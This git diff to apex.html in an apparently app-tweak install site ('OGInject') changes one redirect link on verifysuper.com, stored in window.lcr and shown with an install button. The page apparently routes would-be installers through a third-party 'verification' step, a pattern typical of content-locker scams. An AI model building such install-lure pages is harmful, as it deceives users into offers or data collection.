--- a/itweakvip/OGInject/apex.html
+++ b/itweakvip/OGInject/apex.html
@@ -132,7 +132,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=acfdbe032f941a8f8f1861b3a352b516";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
